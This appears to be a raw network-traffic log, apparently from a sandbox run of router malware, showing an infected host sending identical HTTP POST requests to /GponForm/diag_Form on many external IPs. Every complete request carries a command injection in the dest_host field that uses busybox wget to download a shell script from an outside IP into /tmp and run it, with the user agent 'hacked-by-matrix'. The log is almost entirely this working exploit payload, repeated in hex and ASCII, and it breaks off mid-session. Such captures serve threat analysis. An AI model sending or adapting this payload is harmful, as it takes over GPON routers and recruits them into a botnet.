                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1246192.168.2.1356088212.67.252.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715151072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1247192.168.2.1349852212.9.117.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715152979 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1248192.168.2.13488805.42.88.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715173006 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1249192.168.2.1359904109.214.51.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715183020 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1250192.168.2.1334260118.84.70.232443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715189934 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1251192.168.2.133942042.40.138.224443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715209007 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1252192.168.2.1345114118.187.245.173443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715243101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1253192.168.2.1354428118.19.111.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715265036 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1254192.168.2.1342448109.124.55.4443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715275049 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1255192.168.2.1345510109.139.103.53443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715287924 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1256192.168.2.1358542212.100.159.109443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715287924 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1257192.168.2.1339210212.235.25.0443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715307951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1258192.168.2.135179642.88.137.163443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715329885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1259192.168.2.134109842.16.170.172443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715374947 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1260192.168.2.1348552109.185.244.121443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715382099 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1261192.168.2.13525225.189.126.13443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715403080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1262192.168.2.134735642.140.112.31443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715404034 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1263192.168.2.1344700118.223.46.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715411901 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1264192.168.2.13552045.196.238.168443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715411901 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1265192.168.2.135595842.102.119.96443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715500116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1266192.168.2.1345126212.75.111.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715503931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1267192.168.2.1351064109.137.223.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715543985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1268192.168.2.1348596109.230.209.159443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715578079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
